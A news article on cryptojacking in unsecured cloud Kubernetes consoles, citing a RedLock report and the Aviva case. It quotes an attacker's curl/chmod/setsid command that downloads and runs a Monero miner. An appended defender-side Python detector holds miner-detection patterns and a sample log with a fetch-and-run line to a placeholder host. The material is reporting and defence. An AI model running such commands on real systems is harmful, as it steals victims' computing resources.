Crypto-coin miners caught toiling away in hacked cloud boxes

Manic miners don't even pwn you: They just use default creds admins are too lazy to change

By Richard Chirgwin


Here's yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock's security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It's believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.

It's one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 terawatt-hours, and a single transaction takes 215 kWh.

However, you'd be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such as Coin Hive's, spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva's case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone had automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva's server, with the same email recipient:

curl -L -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp:// -u -p x
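As an added defender-side example, not from the article, RedLock or the Reddit thread, here is a Python matcher that flags container process command lines carrying the indicators visible in the quoted command (a Stratum pool URL, the CryptoNight algorithm flag, a known CPU-miner binary, a curl-then-chmod fetch, and setsid detachment). The log format, the container names and the pool, wallet and download-host values are all constructed placeholders.

```python
import re

# Indicators drawn from the command line quoted in the article, plus xmrig,
# another widely used CPU miner binary. Each pattern is one independent signal.
MINER_PATTERNS = {
    "stratum_pool": re.compile(r"stratum\+(tcp|ssl)://", re.I),
    "cryptonight_algo": re.compile(r"\s-a\s+cryptonight\b", re.I),
    "miner_binary": re.compile(r"(^|[\s/.])(minerd|xmrig)\b", re.I),
    "fetch_and_run": re.compile(r"curl\b.*-o\s+\S+.*chmod\s+[0-7]*7[0-7]*", re.I),
    "detached": re.compile(r"\bsetsid\b|\bnohup\b", re.I),
}

# Constructed process log: "container=<name> pid=<n> cmd=<command line>".
# The miner line mirrors the quoted command; URL, pool and wallet are placeholders.
SAMPLE_PROCESS_LOG = """\
container=mysql-0 pid=4121 cmd=mysqld --user=mysql
container=mysql-0 pid=4198 cmd=curl -L -o minerd http://DOWNLOAD_HOST.example/minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp://POOL.example:3333 -u WALLET_PLACEHOLDER -p x
container=web-frontend-2 pid=88 cmd=nginx -g daemon off;
container=batch-3 pid=902 cmd=python3 train.py --algo adam
"""

LOG_LINE = re.compile(r"container=(?P<container>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)")


def miner_indicators(cmdline: str) -> list:
    """Return the names of every miner indicator found in one command line."""
    return [name for name, rx in MINER_PATTERNS.items() if rx.search(cmdline)]


def is_suspicious(cmdline: str, threshold: int = 2) -> bool:
    # A lone "curl ... chmod" is common in legitimate deploy scripts, so require
    # at least two independent indicators to keep false positives down.
    return len(miner_indicators(cmdline)) >= threshold


def scan_process_log(log: str, threshold: int = 2) -> list:
    """Parse the constructed log format and report every suspicious process."""
    findings = []
    for line in log.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not process records
        hits = miner_indicators(m["cmd"])
        if len(hits) >= threshold:
            findings.append({"container": m["container"], "pid": int(m["pid"]), "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"{finding['container']} pid {finding['pid']}: {', '.join(finding['indicators'])}")
```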

Change those credentials, people. ®
